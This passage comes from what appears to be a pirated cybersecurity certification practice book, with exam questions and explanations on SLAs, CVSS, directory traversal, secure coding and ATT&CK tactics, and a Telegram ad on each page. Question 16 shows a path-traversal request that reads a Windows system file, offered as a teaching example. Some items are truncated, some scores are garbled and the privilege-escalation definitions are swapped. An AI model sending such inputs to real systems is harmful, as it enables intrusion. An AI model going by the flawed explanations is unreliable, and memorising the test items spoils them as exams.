9. INSECURE DEFAULT SETTINGS
10. LACK OF PHYSICAL HARDENING

42
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 13. A telecom company may promise network avail-
ability of 99.999 percent and allow the customer to reduce
their payment by a given percentage if that is not achieved.
Which of the following agreements is described in this exam-
ple?
(A) Memorandum of understanding
(B) Service-level agreement
(C) Organizational governance
(D) Business process interruption

Explanation 13. Service-level agreement is the correct an-

swer. A service-level agreement (SLA) defines the level of ser-
vice expected by a customer from a supplier, laying out the
metrics by which that service is measured, and the remedies or
penalties, if any, should the agreed-on service levels not be
achieved. Usually, SLAs are between companies and external
suppliers, but they may also be between two departments
within a company.

43
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 14. The developer of your company is writing soft-
ware in C language. As he is a junior software engineer he
needs your help to choose secure functions for his projects.
Which of the following functions he shouldn’t use as it is con-
sidered an insecure function?
(A) strcpy()
(B) strncpy()
(C) strlen()
(D) strlwr()

Explanation 14. strcpy is the correct answer. The strcpy()

function does not specify the size of the destination array, so
buffer overrun is often a risk. Using strcpy() function to copy a
large character array into smaller one is dangerous, but if the
string will fit, then it will not worth the risk. If destination string is
not large enough to store the source string then the behavior of
strcpy() is unspecified or undefined.

44
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 15. While you were interpreting Assessment Reports
on Acunetix Vulnerability Scanner you identified a vulnerability
in the system with a Common Vulnerability Scoring System
(CVSS) value of (L) and a score (0.395). Based on the given
scenario, which of the following statements would be true?
(A) There is no impact on the availability of the system
(B) The attacker must either have physical access to the
vulnerable system or a local account
(C) The attacker must authenticate once in order to exploit
the vulnerability
(D) There is no impact on the confidentiality of the system

Explanation 15. The attacker must either have physical ac-

cess to the vulnerable system or a local account is the cor-
rect answer. The CVSS assessment measures three areas of
concern:

1. Base Metrics for qualities intrinsic to a vulnerability

2. Temporal Metrics for characteristics that evolve over the life-
time of vulnerability
3. Environmental Metrics for vulnerabilities that depend on a
particular implementation or environment
A numerical score is generated for each of these metric groups.
A vector string (or simply “vector” in CVSSv2), represents the
values of all the metrics as a block of text.

45
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
The access vector (AV) shows how vulnerability may be ex-
ploited.

Value Description Score

Local (L) The attacker must either have 395

physical access to the vulnerable
system (e.g. firewire attacks) or a
local account (e.g. a privilege
escalation attack).

Adjacent The attacker must have access to 646

Network the broadcast or collision domain
(A) of the vulnerable system (e.g. ARP
spoofing, Bluetooth attacks).

Network The vulnerable interface is 1.0

(N) working at layer 3 or above of the
OSI Network stack. These types of
vulnerabilities are often described
as remotely exploitable (e.g. a
remote buffer overflow in a
network service)

46
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 16. In your company you are using a Web Vulnerabil-
ity Scanner tool named Acunetic to check whether your web-
site and web applications are vulnerable. While you were re-
viewing a scan report you saw the following URL:

http://test.webarticles.com/show.asp?view=../../../../../
Windows/system.ini HTTP/1.1

What type of attack is conducted on that website?

(A) Password spraying
(B) Directory traversal
(C) Privilege escalation
(D) On-path attack

Explanation 16. Directory traversal is the correct

answer. Directory traversal or Path Traversal is an HTTP attack
that allows attackers to access restricted directories and exe-
cute commands outside of the web server’s root directory.

Password spraying is incorrect. Password Spraying is a vari-

ant of what is known as a brute force attack. In a traditional
brute force attack, the perpetrator attempts to gain unautho-
rized access to a single account by guessing the password re-
peatedly in a very short period of time. In a Password Spraying
attack, the attacker circumvents common countermeasures by

47
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
“spraying” the same password across many accounts before
trying another password.

Privilege escalation is incorrect. Privilege escalation attacks

exploit weaknesses and security vulnerabilities with the goal of
elevating access to a network, applications, and mission-criti-
cal systems. There are two types of privilege escalation attacks
including vertical and horizontal. Vertical attacks are when an
attacker gains access to an account with the intent to perform
actions as that user. Horizontal attacks gain access to
account(s) with limited permissions requiring an escalation of
privileges, such as to an administor role, to perform the desired
actions.

On-path attack is incorrect. On-path attackers place them-

selves between two devices (often a web browser and a web
server) and intercept or modify communications between the
two. The attackers can then collect information as well as im-
personate either of the two agents. In addition to websites,
these attacks can target email communications, DNS lookups,
and public WiFi networks.

48
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 17. An organization has hired a cybersecurity analyst
to conduct an assessment of its current wireless network secu-
rity. He has been tasked to capture the inbound and outbound
packets and export the data to text files for further processing
by third-party tools. Which of the following tools the analyst
should use to complete the task?
(A) ScoutSuite
(B) Pacu
(C) Prowler
(D) Aircrack-ng

Explanation 17. Aircrack-ng is the correct answer. Aircrack-

ng is a complete suite of tools to assess WiFi network security.

It focuses on different areas of WiFi security:

- Monitoring: Packet capture and export of data to text files for
further processing by third-party tools
- Attacking: Replay attacks, de-authentication, fake access
points, and others via packet injection
- Testing: Checking WiFi cards and driver capabilities (capture
and injection)
- Cracking: WEP and WPA PSK (WPA 1 and 2)

The rest options are incorrect because they are Cloud in-
frastructure assessment tools.

49
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 18. You have been hired as a cybersecurity analyst to
conduct an assessment against the organization’s network.
Now you are in the process of trying to discover as many attack
vectors as possible that can be used to exploit the systems fur-
ther. Which of the following is the phase you are currently in?
(A) Static analysis
(B) Reverse engineering
(C) Enumaration
(D) Dynamic analysis

Explanation 18. Enumaration is the correct answer. Enu-

meration belongs to the first phase of Ethical Hacking, known
as “Information Gathering”. This is a process where the attacker
establishes an active connection with the victim and tries to
discover as many attack vectors as possible, which can be
used to exploit the systems further.

The rest options are incorrect because they are software as-
sessment tools and techniques.

50
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 19. Your company has moved any workload from its
on-premises environment to Amazon Web Services (AWS) to
benefit from substantial IT costs savings, business agility, and
operational resilience. You have been tasked to recommend a
tool that enables security posture assessment of cloud envi-
ronments. Which of the following tools should you recommend
to complete the task?
(A) Scout Suite
(B) Aircrack-ng
(C) oclHashcat
(D) Reaver

Explanation 19. Scout Suite is the correct answer. Scout

Suite is an open-source multi-cloud security-auditing tool,
which enables security posture assessment of cloud environ-
ments. Using the APIs exposed by cloud providers, Scout Suite
gathers configuration data for manual inspection and highlights
risk areas. Rather than going through dozens of pages on the
web consoles, Scout Suite presents a clear view of the attack
surface automatically.

Cloud Provider Support

The following cloud providers are currently supported:
- Amazon Web Services
- Microsoft Azure

51
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
- Google Cloud Platform
- Alibaba Cloud (alpha)
- Oracle Cloud Infrastructure (alpha)

The rest options are incorrect because they are wireless as-
sessment tools NOT cloud infrastructure assessment tools.

Question 20. You are working on an application with multiple

serverless functions and your task is to deploy a REST API us-
ing Serverless, Express, and Node.js. Which of the following
actions should you perform to ensure that a vulnerability in one
function doesn’t escalate and compromise others as well?
(A) Maintain isolated function perimeters
(B) Employ API gateways as a security buffer
(C) Secure and verify data in transit
(D) Patch function dependencies

Explanation 20. Maintain isolated function perimeters is

the correct answer. Treat every function as its own security
perimeter to ensure that a compromise in one function doesn’t
escalate to other functions and resources:
1. Do not rely on function access and invocation ordering
2. Sanitize function input and treat event data as untrusted
3. Adopt, mandate and re-use security libraries across your
functions
52
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
CHAPTER 2
SOFTWARE AND SYSTEMS
SECURITY

Questions 21-35

53
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 21. Α company is planning to increase the security of
its private network by adding a new security device between
the public and its private network. The device will be used as a
proxy server and will be responsible for routing the traffic be-
tween the two networks. Which of the following devices should
be installed to isolate access to the internal network?
(A) IDS
(B) IPS
(C) Jumpbox
(D) Virtual private network

Question 22. The developer team of your company has just

released a new social media app. The next task for the team is
to measure the robustness of the new app under extremely
heavy load conditions to ensure that the app doesn’t crash un-
der crunch situations. Which of the following software assess-
ment actions do they need to follow to complete the task?
(A) Stress test application
(B) Security regression testing
(C) User acceptance testing
(D) Code review

54
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 23. A cybersecurity researcher is debugging a code
by examining how the application behaves during and after the
execution. Which of the following code analysis methods the
researcher is currently performing?
(A) Static code analysis
(B) Dynamic code analysis
(C) Stress test application
(D) DevSecOps

Question 24. A cybersecurity researcher is debugging a code

by examining the source code of the application before the ex-
ecution. Which of the following code analysis methods the re-
searcher is currently performing?
(A) Static code analysis
(B) Dynamic code analysis
(C) Stress test application
(D) DevSecOps

55
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 25. A developer is building a new CRUD application
for a university. The path like university.com/students/
2/course/6 accessing the course with id 6 for the student
with id 2. This is an example of which service-oriented archi-
tecture?
(A) Security Assertions Markup Language
(B) Simple Object Access Protocol
(C) Representational State Transfer
(D) Microservices

Question 26. A Self-Encrypting Drive is a type of hard drive

that automatically and continuously encrypts the data on the
drive without any user interaction. (TRUE/FALSE)
(A) TRUE
(B) FALSE

56
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 27. As a cybersecurity analyst, you need to find a
way to fool attackers to attack networks that look like legitimate
targets with the aim to track their behavior and collect clues
that will help you make the real network more secure. Which of
the following approaches describes this scenario?
(A) Virtual desktop infrastructure
(B) Honeypot
(C) Virtual private cloud
(D) Software-defined networking

Question 28. Which of the following hardware root of trust

terms is a chip that stores RSA encryption keys specific to the
host system for hardware authentication?
(A) Hardware security module
(B) Trusted Platform Module
(C) Trusted execution
(D) Processor security extensions

57
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 29. Students at examsdigest.com login using their
username and password. As this method has security issues
ExamsDigest's team looking for solutions to increase the secu-
rity of the login system by requiring students to provide more
evidence to prove their identity. Which of the following authen-
tication methods does ExamsDigest need to implement?
(A) Privilege management
(B) Single sign-on
(C) Multifactor authentication
(D) Active defense

Question 30. You are implementing an active defense strategy

for your organization. Which of the following actions should you
perform to outmaneuver an adversary and make an attack more
difficult to carry out.
(A) Intrusion detection system implementation
(B) Honeypot implementation
(C) Intrusion prevention system implementation
(D) Access control list implementation

58
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 31. The developer of your company just released a
new version of the registration form on the web application.
Now the username field should contain only characters and the
password field accepts special characters and numbers. This
an example of which secure coding best practices?
(A) Output encoding
(B) Input validation
(C) Session management
(D) Parameterized queries

Question 32. Mike’s organization uses a hybrid approach for

its infrastructure as they have an on-premise environment for
their services but also they use Amazon Web Services for other
services. Which of the following software tools do they need to
ensure that network traffic between on-premises devices and
the cloud provider complies with the organization’s security
policies?
(A) Virtual desktop infrastructure
(B) Cloud access security broker
(C) Simple Object Access Protocol
(D) Representational State Transfer

59
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 33. The process of replacing HTML control charac-
ters (e.g. <, >, “, &, etc) into their encoded representatives (e.g.
“& lt ;” “& gt ;” “& quot ;” “& amp ;” etc..) is known as?
(A) Input validation
(B) Session management
(C) Output encoding
(D) Parameterized queries

Question 34. A web developer wants to protect its web appli-

cation from session hijacking attacks. Which of the following
actions a web developer should perform to prevent an attacker
to exploit valid sessions? (Choose all that apply.)
(A) Use of a short random number or string as the session
key
(B) Encryption of the data traffic passed between the par-
ties by using SSL/TLS
(C) Use of a long random number or string as the session
key
(D) Regenerating the session id after a successful login
(E) Regenerating the session id after a successful logout

60
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 35. Which of the following are the tactics of the En-
terprise ATT&CK framework? (Choose all that apply.)
(A) Privilege Escalation
(B) Defense Evasion
(C) Credential Access
(D) Lateral Movement
(E) Anti-tamper

61
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Answers 21-35

Question 21. Α company is planning to increase the security of

its private network by adding a new security device between
the public and its private network. The device will be used as a
proxy server and will be responsible for routing the traffic be-
tween the two networks. Which of the following devices should
be installed to isolate access to the internal network?
(A) IDS
(B) IPS
(C) Jumpbox
(D) Virtual private network

Explanation 21. Jumpbox is the correct answer. A jump box

functions as a proxy server and is a way to isolate access to a
private network. It is usually a computer that is connected to
two networks and has two network cards. One network card is
configured with an external IP address that is accessible from
the Internet. The second network card provides an internal IP
address that is only accessible to computers on the internal
network. The jump box is then configured to correctly route
traffic between the two networks.

IDS is incorrect. An intrusion detection system (IDS) is a de-

vice or software application that monitors a network for mali-
cious activity or policy violations.
62
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
IPS is incorrect. An intrusion prevention system (IPS) is a form
of network security that works to detect and prevent identified
threats. Intrusion prevention systems continuously monitor your
network, looking for possible malicious incidents and capturing
information about them.

Virtual private network is incorrect. A virtual private network,

or VPN, is an encrypted connection over the Internet from a de-
vice to a network. The encrypted connection helps ensure that
sensitive data is safely transmitted.

Question 22. The developer team of your company has just

Explanation 22. Stress test application is the correct an-

swer. Stress Testing is a type of software testing that verifies

63
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
the stability & reliability of software applications. The goal of
Stress testing is measuring software on its robustness and error
handling capabilities under extremely heavy load conditions
and ensuring that software doesn’t crash under crunch situa-
tions. It even tests beyond normal operating points and evalu-
ates how the software works under extreme conditions.

Question 23. A cybersecurity researcher is debugging a code

by examining how the application behaves during and after the
execution. Which of the following code analysis methods the
researcher is currently performing?
(A) Static code analysis
(B) Dynamic code analysis
(C) Stress test application
(D) DevSecOps

Explanation 23. Dynamic code analysis is the correct an-

swer. Dynamic code analysis is the method of debugging by
examining an application during or after a program is run.

Static code analysis is incorrect. Static code analysis is a

method of debugging by examining an application’s source
code before a program is run.

64
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Stress test application is incorrect. Stress Testing is a type of
software testing that verifies the stability & reliability of software
applications.

The goal of Stress testing is measuring software on its robust-

ness and error handling capabilities under extremely heavy
load conditions and ensuring that software doesn’t crash under
crunch situations. It even tests beyond normal operating points
and evaluates how the software works under extreme condi-
tions.

DevSecOps is incorrect. DevSecOps is the philosophy of in-

tegrating security practices within the DevOps process. Dev-
SecOps involves creating a ‘Security as Code’ culture with on-
going, flexible collaboration between release engineers and se-
curity teams.

The DevSecOps movement, like DevOps itself, is focused on

creating new solutions for complex software development pro-
cesses within an agile framework.

65
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 24. A cybersecurity researcher is debugging a code
by examining the source code of the application before the ex-
ecution. Which of the following code analysis methods the re-
searcher is currently performing?
(A) Static code analysis
(B) Dynamic code analysis
(C) Stress test application
(D) DevSecOps

Explanation 24. Static code analysis is the correct

answer. Static code analysis is a method of debugging by ex-
amining an application’s source code before a program is run.

Dynamic code analysis is incorrect. Dynamic code analysis

is the method of debugging by examining an application during
or after a program is run.

Stress test application is incorrect. Stress Testing is a type of

software testing that verifies the stability & reliability of software
applications. The goal of Stress testing is measuring software
on its robustness and error handling capabilities under ex-
tremely heavy load conditions and ensuring that software
doesn’t crash under crunch situations. It even tests beyond
normal operating points and evaluates how the software works
under extreme conditions.

66
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
DevSecOps is incorrect. DevSecOps is the philosophy of in-
tegrating security practices within the DevOps process. Dev-
SecOps involves creating a ‘Security as Code’ culture with on-
going, flexible collaboration between release engineers and se-
curity teams. The DevSecOps movement, like DevOps itself, is
focused on creating new solutions for complex software devel-
opment processes within an agile framework.

Question 25. A developer is building a new CRUD application

for a university. The path like university.com/students/
2/course/6 accessing the course with id 6 for the student
with id 2. This is an example of which service-oriented archi-
tecture?
(A) Security Assertions Markup Language
(B) Simple Object Access Protocol
(C) Representational State Transfer
(D) Microservices

Explanation 25. Representational State Transfer is the cor-

rect answer. REST, or REpresentational State Transfer, is an ar-
chitectural style for providing standards between computer
systems on the web, making it easier for systems to communi-
cate with each other.

67
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
There are 4 basic HTTP verbs we use in requests to interact
with resources in a REST system:
GET — retrieve a specific resource (by id) or a collection of re-
sources
POST — create a new resource
PUT — update a specific resource (by id)
DELETE — remove a specific resource (by id)

Let’s say we have an application that allows you to view, create,

edit, and delete customers and orders for a small clothing store
hosted at fashionboutique.com. We could create an HTTP API
that allows a client to perform these functions:
If we wanted to view all customers, the request would look like
this:
GET http://fashionboutique.com/customers
Accept: application/json

Question 26. A Self-Encrypting Drive is a type of hard drive

that automatically and continuously encrypts the data on the
drive without any user interaction. (TRUE/FALSE)
(A) TRUE
(B) FALSE

68
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 26. The correct answer is TRUE. A SED (or Self-
Encrypting Drive) is a type of hard drive that automatically and
continuously encrypts the data on the drive without any user
interaction. This encryption process is done through the use of
a unique and random Data Encryption Key (DEK) which the
drive uses to both encrypt and decrypt the data.

Whenever data is written to the drive, it first gets encrypted ac-

cording to the DEK. Similarly, whenever data is read from the
drive, it first gets decrypted by the same DEK before being sent
to the rest of the system.

Question 27. As a cybersecurity analyst, you need to find a

way to fool attackers to attack networks that look like legitimate
targets with the aim to track their behavior and collect clues
that will help you make the real network more secure. Which of
the following approaches describes this scenario?
(A) Virtual desktop infrastructure
(B) Honeypot
(C) Virtual private cloud
(D) Software-defined networking

Explanation 27. Honeypot is the correct answer. The hon-

eypot looks like a real computer system, with applications and

69
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
data, fooling cybercriminals into thinking it’s a legitimate target.
For example, a honeypot could mimic a company’s customer
billing system – a frequent target of attack for criminals who
want to find credit card numbers. Once the hackers are in, they
can be tracked, and their behavior assessed for clues on how
to make the real network more secure.

Virtual desktop infrastructure is incorrect. Virtual desktop

infrastructure (VDI) is a technology that refers to the use of vir-
tual machines to provide and manage virtual desktops. VDI
hosts desktop environments on a centralized server and de-
ploys them to end-users on request.

Virtual private cloud is incorrect. A virtual private cloud (VPC)

is a secure, isolated private cloud hosted within a public cloud.
VPC customers can run code, store data, host websites, and do
anything else they could do in an ordinary private cloud, but the
private cloud is hosted remotely by a public cloud provider.

Software-defined networking is incorrect. Software-defined

networking (SDN) is an architecture designed to make a net-
work more flexible and easier to manage. SDN centralizes
management by abstracting the control plane from the data
forwarding function in the discrete networking devices.

70
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 28. Which of the following hardware root of trust
terms is a chip that stores RSA encryption keys specific to the
host system for hardware authentication?
(A) Hardware security module
(B) Trusted Platform Module
(C) Trusted execution
(D) Processor security extensions

Explanation 28. Trusted Platform Module is the correct an-

swer. Trusted Platform Module (TPM) technology is designed
to provide hardware-based, security-related functions. A TPM
chip is a secure crypto-processor that is designed to carry out
cryptographic operations.

The chip includes multiple physical security mechanisms to

make it tamper-resistant, and malicious software is unable to
tamper with the security functions of the TPM. A Trusted Plat-
form Module (TPM) is a specialized chip on an endpoint device
that stores RSA encryption keys specific to the host system for
hardware authentication.

Some of the key advantages of using TPM technology are

that you can:
- Generate, store, and limit the use of cryptographic keys.
- Use TPM technology for platform device authentication by

71
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
using the TPM’s unique RSA key, which is burned into itself.
- Help ensure platform integrity by taking and storing security
measurements.

Question 29. Students at examsdigest.com login using their

username and password. As this method has security issues
ExamsDigest's team looking for solutions to increase the secu-
rity of the login system by requiring students to provide more
evidence to prove their identity. Which of the following authen-
tication methods does ExamsDigest need to implement?
(A) Privilege management
(B) Single sign-on
(C) Multifactor authentication
(D) Active defense

Explanation 29. Multifactor authentication is the correct

answer. Multi-factor authentication (MFA) is used to ensure
that digital users are who they say they are by requiring that
they provide at least two pieces of evidence to prove their iden-
tity. Each piece of evidence must come from a different catego-
ry: something they know, something they have or something
they are.

72
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
If one of the factors has been compromised by a hacker or
unauthorized user, the chances of another factor also being
compromised are low, so requiring multiple authentication fac-
tors provides a higher level of assurance about the user’s iden-
tity.

Question 30. You are implementing an active defense strategy

for your organization. Which of the following actions should you
perform to outmaneuver an adversary and make an attack more
difficult to carry out.
(A) Intrusion detection system implementation
(B) Honeypot defense implementation
(C) Intrusion prevention system implementation
(D) Access control list implementation

Explanation 30. Honeypot implementation is the correct

answer. An active defense is the use of offensive actions to
outmaneuver an adversary and make an attack more difficult to
carry out. Slowing down or derailing the attacker so they can-
not advance or complete their attack increases the probability
that they will make a mistake and expose their presence or re-
veal their attack vector.

73
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
An active defense technique is to implement honeypots to
track the behavior of attackers and collect clues that will help
you make the real network more secure.

Question 31. The developer of your company just released a

new version of the registration form on the web application.
Now the username field should contain only characters and the
password field accepts special characters and numbers. This
an example of which secure coding best practices?
(A) Output encoding
(B) Input validation
(C) Session management
(D) Parameterized queries

Explanation 31. Input validation is the correct answer. Input

validation is performed to ensure only properly formed data is
entering the workflow in an information system, preventing
malformed data from persisting in the database and triggering
malfunction of various downstream components. Input valida-
tion should happen as early as possible in the data flow, prefer-
ably as soon as the data is received from the external party.

Output encoding is incorrect. Output encoding is the process

of replacing HTML control characters (e.g. <, >, “, &, etc) into

74
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
their encoded representatives. This is the best mitigtion against
cross-site scripting attacks.

Session management is incorrect. Session management

refers to the process of securely handling multiple requests to a
web-based application or service from a single user or entity.
Websites and browsers use HTTP to communicate, and a ses-
sion is a series of HTTP requests and transactions initiated by
the same user.

Parameterized queries is incorrect. A parameterized query is

a type of SQL query that requires at least one parameter for ex-
ecution. One major reason for using parameterized queries is
that they make queries more readable. The second and most
compelling reason is that parameterized queries help to protect
the database from SQL injection attacks.

75
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 32. Mike’s organization uses a hybrid approach for
its infrastructure as they have an on-premise environment for
their services but also they use Amazon Web Services for other
services. Which of the following software tools do they need to
ensure that network traffic between on-premises devices and
the cloud provider complies with the organization’s security
policies?
(A) Virtual desktop infrastructure
(B) Cloud access security broker
(C) Simple Object Access Protocol
(D) Representational State Transfer

Explanation 32. Cloud access security broker is the correct

answer. A cloud access security broker (CASB) is a software
tool or service that sits between an organization's on-premises
infrastructure and a cloud provider's infrastructure. A CASB
acts as a gatekeeper, allowing the organization to extend the
reach of their security policies beyond their own infrastructure.

CASBs work by ensuring that network traffic between on-

premises devices and the cloud provider complies with the or-
ganization's security policies. The value of cloud access securi-
ty brokers stems from their ability to give insight into cloud ap-
plication use across cloud platforms and identity unsanctioned
use. This is especially important in regulated industries.

76
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Virtual desktop infrastructure is incorrect. Virtual desktop
infrastructure (VDI) is a technology that refers to the use of vir-
tual machines to provide and manage virtual desktops. VDI
hosts desktop environments on a centralized server and de-
ploys them to end-users on request.

Simple Object Access Protocol is incorrect. Simple Object

Access Protocol (SOAP) is a message protocol that allows dis-
tributed elements of an application to communicate. SOAP can
be carried over a variety of lower-level protocols, including the
web-related Hypertext Transfer Protocol (HTTP).

Representational state transfer is incorrect. Representa-

tional state transfer (REST), is a type of software architecture
that was designed to ensure interoperability between different
Internet computer systems.

REST works by putting in place very strict constraints for the

development of web services. Services that conform to the
REST architecture can more easily communicate with one an-
other.

77
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 33. The process of replacing HTML control charac-
ters (e.g. <, >, “, &, etc) into their encoded representatives (e.g.
“& lt ;” “& gt ;” “& quot ;” “& amp ;” etc..) is known as?
(A) Input validation
(B) Session management
(C) Output encoding
(D) Parameterized queries

Explanation 33. Output encoding is the correct

answer. Output encoding is the process of replacing HTML
control characters (e.g. <, >, “, &, etc) into their encoded repre-
sentatives. This is the best mitigtion against cross-site scripting
attacks.

Input validation is incorrect. Input validation is performed to

ensure only properly formed data is entering the workflow in an
information system, preventing malformed data from persisting
in the database and triggering malfunction of various down-
stream components. Input validation should happen as early as
possible in the data flow, preferably as soon as the data is re-
ceived from the external party.

Session management is incorrect. Session management

refers to the process of securely handling multiple requests to a
web-based application or service from a single user or entity.
Websites and browsers use HTTP to communicate, and a ses-
78
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
sion is a series of HTTP requests and transactions initiated by
the same user.

Parameterized queries is incorrect. A parameterized query is

Question 34. A web developer wants to protect its web appli-

79
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 34. The correct answers are:
1. Encryption of the data traffic passed between the parties
by using SSL/TLS
2. Use of a long random number or string as the session
key
3. Regenerating the session id after a successful login

Session hijacking is an attack where a user session is taken

over by an attacker. A session starts when you log into a ser-
vice, for example, your banking application, and ends when you
log out.

Methods to prevent session hijacking include:

1. Encryption of the data traffic passed between the parties by
using SSL/TLS; in particular the session key. This technique is
widely relied-upon by web-based banks and other e-com-
merce services because it completely prevents sniffing-style
attacks.
2. Use of a long random number or string as the session key.
This reduces the risk that an attacker could simply guess a
valid session key through trial and error or brute force attacks.
3. Regenerating the session id after a successful login. This
prevents session fixation because the attacker does not know
the session id of the user after they have logged in.
4. Some services make secondary checks against the identity
80
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
of the user. For instance, a web server could check with each
request made that the IP address of the user matched the one
last used during that session.

Question 35. Which of the following are the tactics of the En-
terprise ATT&CK framework? (Choose all that apply.)
(A) Privilege Escalation
(B) Defense Evasion
(C) Credential Access
(D) Lateral Movement
(E) Anti-tamper

Explanation 35. The correct answers are:

1. Privilege Escalation
2. Defense Evasion
3. Credential Access
4. Lateral Movement

The Enterprise ATT&CK framework consists of 11 tactics. Con-

sider tactics the "why" part of the ATT&CK equation. What ob-
jective did the attacker want to achieve with the compromise?
- Initial Access
- Execution
- Persistence

81
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
- Privilege Escalation
- Defense Evasion
- Credential Access
- Discovery
- Lateral Movement
- Collection
- Exfiltration
- Impact

82
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
CHAPTER 3
SECURITY OPERATIONS
AND MONITORING

Questions 36-50

83
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 36. Which of the following protocols is commonly
used to collect information about CPU utilization and band-
width from network devices and automatically send the admin-
istrator an email if a predefined threshold is exceeded?
(A) HTTP
(B) SNMP
(C) DHCP
(D) SMTP

Question 37. You have set up an Intrusion detection system

(IDS) and suddenly the IDS identifies an activity as an attack
but the activity is acceptable behavior. The state, in this case, is
known as:
(A) False-positive
(B) False-negative
(C) Non-credentialed scans
(D) Credentialed scans

84
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 38. During a vulnerability scan, you found a serious
SQL injection vulnerability in one of your online shop that has
10,000 daily visitors. The eshop provides 99.999% availability
to customers so it can’t be taken offline to fix the SQL injection
vulnerability. Which of the following solutions should you rec-
ommend to the eshop administrators until the eshop can be
remediated?
(A) Port security
(B) WAF
(C) Honeypot
(D) Sandboxing

Question 39. The developers of your company for efficiency

purposes they need to implement a solution to deploy new
code releases automatically into the production
environment. Which of the following software development
method the developers should implement?
(A) Continuous integration
(B) Continuous monitoring
(C) Continuous delivery
(D) Continuous deployment

85
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 40. Which of the following process is designed to
trigger automatic code integration in the main code base in-
stead of developing in isolation and then integrating them at
the end of the development cycle?
(A) Continuous deployment
(B) Continuous integration
